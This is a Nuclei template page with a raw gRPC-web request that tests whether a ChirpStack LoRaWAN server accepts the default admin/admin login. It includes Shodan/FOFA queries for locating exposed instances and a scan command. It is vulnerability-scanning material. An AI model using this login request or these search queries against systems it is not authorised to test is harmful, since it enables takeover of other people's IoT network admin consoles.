ChirpStack - Default Login

ID: chirpstack-default-login

Severity: high

Author: t3l3machus

Tags: default-login,chirpstack

Description

Fresh ChirpStack installations use the default credentials (admin/admin), allowing attackers to easily access the admin console.

YAML Source

id: chirpstack-default-login

info:
  name: ChirpStack - Default Login
  author: t3l3machus
  severity: high
  description: |
    Fresh ChirpStack installations use the default credentials (admin/admin), allowing attackers to easily access the admin console.
  reference:
    - https://www.chirpstack.io/docs/chirpstack/use/login.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-1392
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.title:"ChirpStack LoRaWAN"
    fofa-query: title="ChirpStack LoRaWAN"
  tags: default-login,chirpstack

http:
  - raw:
      - |
        POST /api.InternalService/Login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/grpc-web-text
        Accept: application/grpc-web-text

        AAAAAA4KBWFkbWluEgVhZG1pbg==

      # AAAAAA4KBWFkbWluEgVhZG1pbg== is proto buffer encoded string for admin admin

    matchers:
      - type: dsl
        dsl:
          - "contains(content_type, 'application/grpc-web-text+proto')"
          - "status_code==200"
          - "contains(body, 'AAAAA')"
        condition: and
# digest: 4b0a00483046022100cb3560bf0f467f37155922829f58fb8882ae97a5205fa41aa31aef0e5595d63c022100844dfc2e322d4563684284492d05f63b4611086be1785663b97b977580760e37:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/default-logins/chirpstack/chirpstack-default-login.yaml"

View on Github